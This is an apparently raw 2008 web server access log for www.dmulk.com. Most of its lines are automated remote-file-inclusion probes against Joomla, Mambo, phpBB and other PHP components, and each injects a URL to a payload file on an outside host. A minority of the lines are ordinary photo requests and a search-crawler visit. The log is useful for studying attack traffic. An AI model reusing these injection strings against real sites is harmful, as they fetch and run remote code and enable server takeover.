70.84.138.2 - - [08/Jun/2008:11:09:04 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:09:04 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:09:04 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:11:09:15 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:11:09:16 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:11:09:16 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:09:24 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:09:25 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:09:25 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.119.200.212 - - [08/Jun/2008:11:09:28 -0700] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://media-day.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.212 - - [08/Jun/2008:11:09:28 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://media-day.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.212 - - [08/Jun/2008:11:09:29 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://media-day.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.188.110.128 - - [08/Jun/2008:11:09:31 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:11:09:42 -0700] "GET /logs/dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:11:09:42 -0700] "GET /dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:09:43 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.15.205.17 - - [08/Jun/2008:11:09:51 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [08/Jun/2008:11:09:52 -0700] "GET /logs/access_080228.log//modules/vwar/admin/admin.php?vwar_root=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.26.18 - - [08/Jun/2008:11:09:54 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [08/Jun/2008:11:09:55 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:10:00 -0700] "GET /logs/access_071225.log//config.php?path[docroot]=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:10:02 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:11:10:07 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:11:10:09 -0700] "GET //index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 200 16859 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:11:10:09 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:10:11 -0700] "GET /logs/access_071225.log//config.php?path[docroot]=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:10:28 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.172.182.209 - - [08/Jun/2008:11:11:03 -0700] "GET /logs/access_080513.log//22_ultimate/templates/header.php?mainpath=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [08/Jun/2008:11:11:03 -0700] "GET //22_ultimate/templates/header.php?mainpath=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [08/Jun/2008:11:11:03 -0700] "GET /logs//22_ultimate/templates/header.php?mainpath=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:40 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_036M.jpg HTTP/1.1" 200 106307 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:40 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_038M.jpg HTTP/1.1" 200 118507 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:41 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_039M.jpg HTTP/1.1" 200 115438 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:41 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_041M.jpg HTTP/1.1" 200 106932 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:11:41 -0700] "GET /logs/inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:11:41 -0700] "GET /inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:41 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_044M.jpg HTTP/1.1" 200 77224 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:41 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_008M.jpg HTTP/1.1" 200 80517 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:41 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_016M.jpg HTTP/1.1" 200 70257 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:41 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_009M.jpg HTTP/1.1" 200 56619 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:42 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_011M.jpg HTTP/1.1" 200 72607 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:42 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_013M.jpg HTTP/1.1" 200 60607 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:42 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_014M.jpg HTTP/1.1" 200 55882 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:42 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_015M.jpg HTTP/1.1" 200 59608 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:42 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_022M.jpg HTTP/1.1" 200 81615 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:42 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_020M.jpg HTTP/1.1" 200 98199 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:43 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_030M.jpg HTTP/1.1" 200 98194 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:43 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_035M.jpg HTTP/1.1" 200 96763 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:43 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_053M.jpg HTTP/1.1" 200 108392 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:43 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_071M.jpg HTTP/1.1" 200 119050 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:43 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_055M.jpg HTTP/1.1" 200 84400 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:43 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_056M.jpg HTTP/1.1" 200 68291 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:44 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_058M.jpg HTTP/1.1" 200 120428 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:44 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_059M.jpg HTTP/1.1" 200 68572 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:44 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_066M.jpg HTTP/1.1" 200 138730 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:44 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_067M.jpg HTTP/1.1" 200 56379 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:44 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_060M.jpg HTTP/1.1" 200 76230 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:44 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_061M.jpg HTTP/1.1" 200 70278 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:45 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_072M.jpg HTTP/1.1" 200 25828 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:45 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_069M.jpg HTTP/1.1" 200 113088 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:45 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_076M.jpg HTTP/1.1" 200 24103 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:11:45 -0700] "GET /bikes/dteel/2008-05-30/Panarama_CreSTOC_2008M.jpg HTTP/1.1" 200 14593 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:11:46 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:11:46 -0700] "GET /config.php?path_to_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:11:47 -0700] "GET /logs/config.php?path_to_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:12:14 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:12:17 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:12:20 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:12:22 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:11:12:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:11:12:34 -0700] "GET //skin/zero_vote/error.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:12:37 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:12:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:11:13:29 -0700] "GET /logs/access_080513.log//22_ultimate/templates/header.php?mainpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:11:13:30 -0700] "GET //22_ultimate/templates/header.php?mainpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:11:13:30 -0700] "GET /logs//22_ultimate/templates/header.php?mainpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:13:39 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:13:47 -0700] "GET /logs/access_080122.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.110.50.106 - - [08/Jun/2008:11:13:49 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
78.110.50.106 - - [08/Jun/2008:11:13:51 -0700] "GET //index.php?option=com_custompages&cpage=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 200 16901 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
74.208.99.73 - - [08/Jun/2008:11:14:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.99.73 - - [08/Jun/2008:11:14:02 -0700] "GET //skin/zero_vote/error.php?dir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:14:08 -0700] "GET /logs/access.log/db.php?path_local=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:11:14:09 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:14:12 -0700] "GET /db.php?path_local=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:14:15 -0700] "GET /logs/db.php?path_local=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.104.25 - - [08/Jun/2008:11:14:23 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.104.25 - - [08/Jun/2008:11:14:23 -0700] "GET /presto/?N=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:14:28 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:14:28 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:14:32 -0700] "GET /logs/access_080216.log//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:14:32 -0700] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:14:34 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:14:37 -0700] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.16.18 - - [08/Jun/2008:11:14:45 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.safonov.sumy.ua/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.48.154 - - [08/Jun/2008:11:14:46 -0700] "GET /logs//citywriter/head.php?path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.48.154 - - [08/Jun/2008:11:14:47 -0700] "GET //citywriter/head.php?path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:15:06 -0700] "GET /logs/access_071219.log/components/com_simpleboard/image_upload.php?sbp=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:15:06 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:15:06 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:15:13 -0700] "GET /logs/access_080220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:11:15:14 -0700] "GET /logs/access_080421.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.177.153 - - [08/Jun/2008:11:15:24 -0700] "GET /logs/access_080429.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://linuxsolutions.co.ug/linux/cache/vuln.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:11:15:27 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:11:15:27 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
